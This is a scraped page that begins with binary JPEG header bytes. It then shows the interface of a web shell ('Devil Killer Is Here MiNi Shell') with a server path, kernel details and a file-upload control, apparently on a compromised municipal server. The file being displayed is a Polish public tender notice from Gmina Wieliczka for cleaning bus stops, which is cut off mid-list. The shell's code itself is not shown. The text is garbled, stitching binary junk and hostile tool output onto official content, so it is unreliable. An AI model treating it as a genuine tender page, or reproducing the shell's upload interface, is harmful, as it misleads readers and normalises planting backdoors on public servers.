JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241213/0065326401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Realizacja prac związanych z utrzymaniem czystości i porządku na przystankach komunikacji publicznej i parkingach typu P&amp;R na terenie gminy Wieliczka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WIELICZKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351555364</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Powstania Warszawskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 263 41 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 278 68 60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">magistrat@wieliczka.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wieliczka.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Realizacja prac związanych z utrzymaniem czystości i porządku na przystankach komunikacji publicznej i parkingach typu P&amp;R na terenie gminy Wieliczka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3c9a9cbf-5609-40ce-86de-e25cf2051d4d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00653264</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00046162/22/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Realizacja prac związanych z utrzymaniem czystości i porządku na przystankach komunikacji publicznej i parkingach typu P&amp;R na terenie gminy Wieliczka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1036315 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcą odbywa się za pośrednictwem platformazakupowa.pl dostępnej pod adresem: https://platformazakupowa.pl/pn/wieliczka. Link bezpośredni: https://platformazakupowa.pl/transakcja/1036315</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a wykonawcą odbywa się za pośrednictwem platformazakupowa.pl<br/><br/>2. Złożenie oferty następuje poprzez jej umieszczenie na platformazakupowa.pl, pod adresem: https://platformazakupowa.pl/pn/wieliczka. Link bezpośredni: Link bezpośredni: https://platformazakupowa.pl/transakcja/1036315. Po wypełnieniu Formularza składania oferty lub wniosku i dołączenia wszystkich wymaganych załączników należy kliknąć przycisk „Przejdź do podsumowania”. Oferta składana elektronicznie musi zostać podpisana elektronicznym podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym.<br/><br/>3. Wymaga się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje (nie dotyczy oferty), przekazywane były w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/><br/>4. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji &#34;Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy na adres e-mail podany w formularzu ofertowym, oraz na adres podany przez Wykonawcę przy składaniu oferty.<br/><br/>5. Ofertę oraz dokumenty i oświadczenia składane wraz z ofertą, jak również wszelkie dokumenty i oświadczenia składane w trakcie postępowania, należy składać w formie elektronicznej (t.j. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/><br/>6. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) oraz w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 poz. 2415 ze zm. ).<br/><br/>7. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: - akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej https://platformazakupowa.pl/strona/1- regulamin oraz uznaje go za wiążący. - zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje 8.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/><br/>1. Administratorem Pani/Pana danych osobowych jest Burmistrz Miasta i Gminy Wieliczka z siedzibą w Wieliczce, 32-020 Wieliczka, ul. Powstania Warszawskiego 1; <br/><br/>2. Inspektorem ochrony danych osobowych w Urzędzie Miasta i Gminy w Wieliczce jest Pan Jacek Krzyżaniak – Inspektor Ochrony Danych: iod@wieliczka.eu;<br/><br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO (przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze) w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego.<br/><br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 – Prawo zamówień publicznych (tj.: Dz. U. z 2024 r. poz. 1320), dalej „ustawa Pzp”; 5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/><br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/><br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.44.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 512920,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 311920 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część 1 - Utrzymanie czystości i porządku na przystankach komunikacji publicznej na terenie Miasta Wieliczka:<br/> Przedmiotem zamówienia jest realizacja prac związanych z utrzymaniem czystości i porządku na przystankach komunikacji publicznej na terenie Miasta Wieliczka zgodnie z zakresem wymaganych prac, które obejmują:<br/> Łączna ilość przystanków: 82 <br/> • Ilość przystanków z wiatami: 42<br/> • Ilość przystanków bez wiat: 40<br/> Za teren przystanku komunikacyjnego uważa się miejsce o długości 10 mb i szerokości 3 mb w obrębie słupka/wiaty przystankowej. W przypadku istniejącego rowu przy przystanku – jego utrzymanie należy również do terenu przystanku.<br/> Za teren zatoki uważa się wydzieloną zatokę ograniczoną trwałym ogranicznikiem np. krawężnikiem, obrzeżem o długości 20 mb i szerokości 3 mb.<br/> Łączny teren przystanków do utrzymania: 82 przystanków x 45m2 = 3 690 m2<br/> WYKAZ PRZYSTANKÓW NA TERENIE MIASTA WIELICZKA:<br/> 1) ul. Krakowska I - stacja paliw – prawy i lewy<br/> 2) ul. Narutowicza II – Klasztor - prawy <br/> 3) ul. Piłsudskiego II – Klasztor – lewy<br/> 4) ul. Piłsudskiego I – Cmentarz – prawy i lewy<br/> 5) ul. Piłsudskiego III - Kampus- prawy<br/> 6) ul. Dembowskiego I - PKP – prawy i lewy<br/> 7) ul. Dembowskiego II – Wieliczka Park – prawy i lewy<br/> 8) ul. Dembowskiego III – Kopalnia Soli – prawy i lewy<br/> 9) ul. Słowackiego - Mediateka – prawy i lewy<br/> 10) ul. W. Pola I – Kampus – pętla 2 przystanki <br/> 11) ul. Daniłowicza I – Kopalnia Soli – lewy<br/> 12) ul. Grottgera – Lekarka (przy parku osiedlowym) - prawy i lewy<br/> 13) ul. Grottgera – Lekarka I - prawy i lewy<br/> 14) ul. Długa I - skrzyżowanie ul. Reformacka – prawy i lewy<br/> 15) ul. Bogucka I – Arena lekkoatletyczna – prawy i lewy <br/> 16) ul. Bogucka II - Wodrol – prawy i lewy (tylko słupek)<br/> 17) ul. Czarnochowska I – Cmentarz – prawy i lewy<br/> 18) ul. Czarnochowska II – Korpala – prawy<br/> 19) ul. Czarnochowska II – Orzechowa – lewy<br/> 20) ul. Goliana I – prawy<br/> 21) ul. Wygoda I – kapliczka – prawy i lewy<br/> 22) ul. Wygoda II – prawy i lewy <br/> 23) ul. Wygoda, Zbożowa - lewy<br/> 24) ul. Sienkiewicza I – szkoła – prawy<br/> 25) ul. Mietniowska I – lewy<br/> 26) ul. Chopina – prawy i lewy<br/> 27) ul. Klaśnieńska I – prawy i lewy<br/> 28) ul. Powstania Warszawskiego – Magistrat – prawy<br/> 29) ul. Kościuszki Solne Miasto -prawy i lewy<br/> 30) ul. Janińska Sąd - prawy i lewy<br/> 31) ul. Sadowa Krzyszkowice (os. Szymanowskiego) - prawy i lewy<br/> 32) ul. Sadowa II Krzyszkowice -Kościół - prawy i lewy<br/> 33) ul. Sadowa I – prawy <br/> 34) ul. Sadowa IV- prawy<br/> 35) ul. Krzyszkowicka Dom Ludowy - lewy i prawy<br/> 36) ul. Krzyszkowicka Szkoła<br/> 37) ul. Ochota I Krzyszkowice Modrzewiowa - prawy i lewy<br/> 38) ul. Ochota II Krzyszkowice Różana – prawy i lewy<br/> 39) Wieliczka Granice Miasta – ul. Ochota<br/> 40) ul. Jedynaka I - prawy i lewy<br/> 41) ul. Kasztanowa I – prawy i lewy<br/> 42) ul. Kasztanowa II -prawy i lewy<br/> 43) ul. Asnyka – prawy i lewy<br/> 44) Niepołomska granica-lewy<br/> 45) ul. Gdowska, Ochronka – prawy<br/> 46) ul. Gdowska (skrzyżowanie ul. Polna) prawy i lewy<br/> 47) Wieliczka Granice Miasta – A4<br/> 48) ul. Konopnickiej Szkoła <br/> 49) Ul. Mickiewicza – prawy i lewy <br/> 50) Wieliczka Miasto ( przy rondzie Armii Krajowej) – prawy i lewy<br/> <br/> 2. ZAKRES WYMAGANYCH PODSTAWOWYCH PRAC ZWIĄZANYCH Z ZADANIAMI DOTYCZĄCYMI CZĘŚCI 1,<br/> 2.1. Utrzymanie w należytym porządku terenu zatok/miejsc przystankowych/parkingów, zamiatanie, opróżnianie koszy na śmieci, uzupełnianie wkładów (worków):<br/>- Utrzymanie czystości na przystankach komunikacyjnych/zatokach przystankowych/parkingach polegające na bieżącym zbieraniu śmieci z terenu. <br/>- Opróżnianie koszy na przystankach komunikacyjnych/parkingach minimum 2 razy w tygodniu, uzupełnianie worków na śmieci.<br/>Należy przyjąć następującą liczbę koszy na śmieci w ramach poszczególnych części zamówienia:<br/> Część 1 - 70 szt.<br/>- Oczyszczanie nawierzchni przystanków komunikacyjnych/zatok przystankowych/parkingów z błota, kurzu, liści i wszelkich innych zanieczyszczeń wraz z wywozem zebranych odpadów.<br/> 2.2. Koszenie i wywożenie trawy – jeśli w obrębie zatoki/miejsca przystankowego/parkingu znajduje się teren zielony:<br/>- Bieżące koszenie trawy, wysokość trawy: max. 15cm;<br/>- Wywóz skoszonej trawy.<br/> 2.3. W okresie zimowym odśnieżanie i posypywanie terenu zatoki/miejsca przystankowego/parkingu, wywożenie nadmiaru śniegu:<br/>- bieżące odśnieżanie i zwalczanie śliskości zimowej na przystankach komunikacyjnych/ zatokach przystankowych/parkingach, teren winien być posypany piaskiem na całej długości i szerokości;<br/>- w razie nadmiaru śniegu – śnieg powinien być wywożony na bieżąco.<br/> 2.4. Po okresie zimowym teren przystanków komunikacyjnych/zatok przystankowych/parkingów powinien zostać oczyszczony z piasku, żwiru, błota.<br/> 2.5. Mycie wiat przystankowych, usuwanie naklejek, napisów i graffiti, mycie ławek.<br/>- mycie wiat przystankowych przy użyciu piany aktywnej minimum 2 x w roku, a w przypadku zgłoszeń wpływających do urzędu ( mailowe/ telefoniczne / pisemne) - dodatkowo na wezwanie pracownika Urzędu Miasta i Gminy w Wieliczce,<br/>- usuwanie naklejek, zbędnych ogłoszeń (wraz z klejem i taśmą klejącą) napisów, graffiti minimum raz w miesiącu, a w przypadku zgłoszeń wpływających do urzędu ( mailowe/ telefoniczne / pisemne) - dodatkowo na wezwanie pracownika Urzędu Miasta i Gminy w Wieliczce;<br/>- mycie ławek;<br/>- spłukiwanie peronów po umyciu wiat. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 75520,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-13 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które odpowiadają wymaganiom opisanym w SWZ. Wybór najkorzystniejszej oferty odrębnie dla każdej części zamówienia nastąpi na podstawie wyznaczonych przez Zamawiającego kryteriów. Punkty będą zaokrąglane do dwóch miejsc po przecinku lub z większą dokładnością, jeżeli przy zastosowaniu wymienionego zaokrąglenia nie występuje różnica w ilości przyznanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Usługi interwencyjne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe mycie wiat przystankowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część 2 - Utrzymanie czystości i porządku na przystankach komunikacji publicznej na terenie Sołectw w gminie Wieliczka:<br/>Przedmiotem zamówienia jest realizacja prac związanych z utrzymaniem czystości i porządku na przystankach komunikacji publicznej na terenie Sołectw w gminie Wieliczka zgodnie z zakresem wymaganych prac, które obejmują:<br/>Łączna ilość przystanków: 304 <br/>•	Ilość przystanków z wiatami: 131<br/>•	Ilość przystanków bez wiat: 173<br/>Za teren przystanku komunikacyjnego uważa się miejsce o długości 10 mb i szerokości 3 mb w obrębie słupka/wiaty przystankowej. W przypadku istniejącego rowu przy przystanku – jego utrzymanie należy również do terenu przystanku.<br/>Za teren zatoki uważa się wydzieloną zatokę ograniczoną trwałym ogranicznikiem np. krawężnikiem, obrzeżem o długości 20 mb i szerokości 3 mb.<br/>Łączny teren przystanków do utrzymania: 304 przystanków x 45m2 = 13 680 m2<br/>WYKAZ PRZYSTANKÓW NA TERENIE SOŁECTW GMINY WIELICZKA:<br/>Brzegi Dom Kultury – prawy i lewy<br/>Brzegi Grobla - prawy i lewy<br/>Brzegi Granica - prawy i lewy<br/>Brzegi Pętla<br/>Brzegi użytek ekologiczny - prawy i lewy<br/>Byszyce Kopce<br/>Byszyce VII -prawy i lewy<br/>Byszyce V -prawy i lewy<br/>Byszyce IV - prawy i lewy<br/>Byszyce III - prawy i lewy<br/>Chorągwica Centrum - prawy i lewy<br/>Chorągwica I<br/>Chorągwica Krzewiny - prawy i lewy<br/>Chorągwica Pod Strażą I<br/>Chorągwica Pod Strażą II<br/>Chorągwica VII - prawy i lewy<br/>Chorągwica za Górą -prawy i lewy<br/>Chorągwica Maki - prawy i lewy<br/>Czarnochowice Kościół - prawy i lewy<br/>Czarnochowice Budziaka - prawy i lewy<br/>Czarnochowice Dom Ludowy - prawy i lewy<br/>Czarnochowice IX - prawy i lewy<br/>Czarnochowice Kapliczka - prawy i lewy<br/>Czarnochowice Kokotowska I<br/>Czarnochowice Kokotowska II<br/>Czarnochowice Łączki - prawy i 